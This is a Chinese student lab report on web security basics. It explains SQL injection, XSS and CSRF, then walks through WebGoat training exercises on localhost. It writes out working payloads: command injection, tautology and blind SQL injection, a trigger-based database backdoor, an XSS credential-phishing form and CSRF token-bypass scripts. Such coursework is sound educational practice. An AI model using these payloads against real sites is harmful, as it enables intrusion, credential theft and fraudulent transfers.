EXP9 Web安全基础实践

EXP9 Web安全基础实践

基础问题回答

1.SQL注入攻击原理，如何防御？

原理：SQL注入是一种将SQL代码添加到输入参数中，传递到服务器解析并执行的一种攻击手法。SQL注入攻击是输入参数未经过滤，然后直接拼接到SQL语句当中解析，执行达到预想之外的一种行为，简单来说就是让应用运行本不应该运行的SQL代码。
防御：
1.对输入的数据进行过滤，过滤掉敏感字符。加密数据库。
2.在PHP配置文件中Register_globals=off;设置为关闭状态,作用将注册全局变量关闭。
3.提高数据库命名技巧，对于一些重要的字段根据程序的特点命名，取不易被猜到的
4.开启PHP安全模式Safe_mode=on;

2.XSS攻击的原理，如何防御？

原理：攻击者利用网站漏洞，输入可以显示在页面上的、对其他用户造成影响的HTML代码；由于受害者浏览器对目标服务器的信任，当其访问目标服务器上被注入恶意脚本的页面后，这段恶意脚本可以顺利执行，实现获取用户cookie并可以利用用户身份进行非法操作的目的。
防御：
在服务器段限制输入格式,输入类型，输入长度以及输入字符
要注意避免使用一些有潜在危险的html标签，这些标签很容易嵌入一些恶意网页代码。

3.CSRF攻击原理，如何防御？

什么是CSRF:CSRF（Cross-site request forgery）跨站请求伪造，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
原理：通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。
防御：用户在浏览其它站点前登出站点；在浏览器会话结束后清理浏览器的cookie；尽量不要在页面的链接中暴露用户隐私信息；避免全站通用的cookie，严格设置cookie的域。

实验准备

• 安装webgoat
  1.打开的时候发现没有安装：
  

2.下载好后，将它放在home里，开启webgoat

3.当界面停留在上图所示时，最小化不要关闭。打开浏览器，输入localhost:8080/WebGoat

4.选择默认账号、密码即可登陆成功

• 火狐浏览器firebug
  1.安装火狐浏览器（附上教程链接）
  link
  2.使用时，可以在页面需要修改的地方右键打开
  

完成列表

实验过程

Injection Flaws

1.Command Injection

在目标主机上执行系统命令.

• 在BackDoors.help旁边加上

  "& netstat -an & ipconfig"

  

• .选中修改后的值再点view，可以看到命令被执行，出现系统网络连接情况
  

2.Numeric SQL Injection

注入SQL字符串，使其可以查看所有天气的数据。

• 利用firebug在任意一个值后面加上 or 1=1（永真）
  

• 点击GO，就能看到所有天气
  

3.Log Spoofing

我们输入的用户名会被追加到日志文件中

• 在User Name文本框中输入

  xxx%0d%0aLogin Succeeded for username:admin

  ，其中%0d是回车，%0a是换行符

• 攻击成功
  

4.XPATH Injection

要求使用帐户Mik/Test123，实现查看其他员工的数据

• 尝试构造永真式

user name:gjt' or 1=1 or 'a'='a
password:gjt

• 成功
  

5.String SQL Injection

• 构造一个永真式“1”，那么不管前面的WHERE是否成立都能执行，所以构造语句'or 1='1,成功得到了全部的信用卡号
  

6.LAB: SQL Injection

Stage 1：String SQL Injection

使用String SQL注入来绕过身份验证

• 修改password的最大程度8→100
  

• 以用户Neville登录，在密码栏中输入' or 1=1 --永真式进行SQL注入
  

• 成功
  

Stage 3:Numeric SQL Injection

• 先使用上一题的办法登录进Larry的账户
  

• Boss的工资最高，所以把其中的value值改为

  101 or 1=1 order by salary desc --

  ，这样老板的信息就会被排到第一个
  

• 点击ViewProfile进去，即可查看老板的详细信息
  

7.Database Backdoors

• 输入注入语句：101; update employee set salary=10000，成功把该用户的工资涨到了10000
  

• 再使用语句

  101;CREATE TRIGGER yqhBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid

  创建一个后门，把表中所有的邮箱和用户ID都设为我的。
  

8.Blind Numeric SQL Injection

-构造输入语句

101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') >

数值 );，根据返回的语句是否合法判断pin值的范围。

• 这里使用二分法，确实有些费时费力，需要从2000，3000，2500，2250，2375，2313，2344，2360，2368，2364......一直试下去，最后确定值是2364，输入2364后破解成功：
  

9.Blind String SQL Injection

• 1.输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) >'z' );进行猜解，发现结果为Account number is valid，账户有效。
  

猜测是否是大写字母

• 2.接下来依次猜测之后的字母
  输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) >'h' );最后确定用户名为Jill
  

Cross-Site Scripting (XSS)

1.Phishing with XSS

• 1.使用XSS和HTML插入制作一个钓鱼网站，将其输在search框中，代码如下：

</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br><br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

• 输入后下拉网页，会有用户名和密码的框出现，随意输入用户名和密码
  

• 成功
  

2.Reflected XSS Attacks

• 我们将带有攻击性的URL作为输入源，比如

  <script>alert("23320154329gjt");</script>

  ，就会弹出对话框
  

• 成功

3.Stored XSS Attacks

• 在信息框里输入

  <script>alert("20154329gjt");</script>，

  点击提交之后，留言板上会出现这条信息的标题
  

• 点击标题链接，攻击成功
  

CSRF

1.Cross Site Request Forgery

• 在信息框内输入（这句话的意思是将Funds即金钱转到自己的账户里）,点击提交之后可以看到信息
  

• 点击标题链接，攻击成功
  

2.CSRF Prompt By-Pass

• 在信息框输入

  <img src="attack?Screen=src值&menu=menu值&transferFunds=5000" 
  width="1" height="1"> 
  <img src="attack?Screen=src值&menu=menu值&transferFunds=confirm" 
  width="1" height="1">

  

• 点击标题链接，攻击成功
  

3.CSRF Token By-Pass

• 在Title输入：gjt
• 在Message输入构造的代码

<script>
    var tokensuffix;
     
    function readFrame1()
    {
        var frameDoc = document.getElementById("frame1").contentDocument;
        var form = frameDoc.getElementsByTagName("form")[0];
        tokensuffix = '&CSRFToken=' + form.CSRFToken.value;
     
        loadFrame2();
    }
     
    function loadFrame2()
    {
        var testFrame = document.getElementById("frame2");
        testFrame.src="attack?Screen=src值&menu=menu值&transferFunds=5000" + tokensuffix;
    }
</script>
 
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=main"
    onload="readFrame1();"
    id="frame1" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"></iframe>
 
<iframe id="frame2" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"></iframe>

• 点击Submit，然后在Message List里点击“CSRF Token By-Pass Attack”，如下图所示：
  

实验心得与体会

量的积累可以导致质变，确实是这样，做第一个的时候还有点懵，做的多了慢慢就像打通了任督二脉，突然就懂了。XXS会利用站点内受信任的用户来盗取数据，而CSRF则通过伪装来自受信任用户的请求来利用网站。Besides,网络上所有的东西都是靠各种各样的代码运行起来的，SQL注入真的很机智啊，在此之前我从来不会想过，输入用户名的地方输入了奇奇怪怪的东西会出现意想不到的结果。还有就是使用firebug修改网页上的代码，因为无知，所以我觉得很多实验内容都很神奇。网络对抗课为我打开了新世界的大门，虽然这个学期很快就要结束了，但是路漫漫其修远兮，还有太多的东西需要了解、需要学习，想想还有点小激动。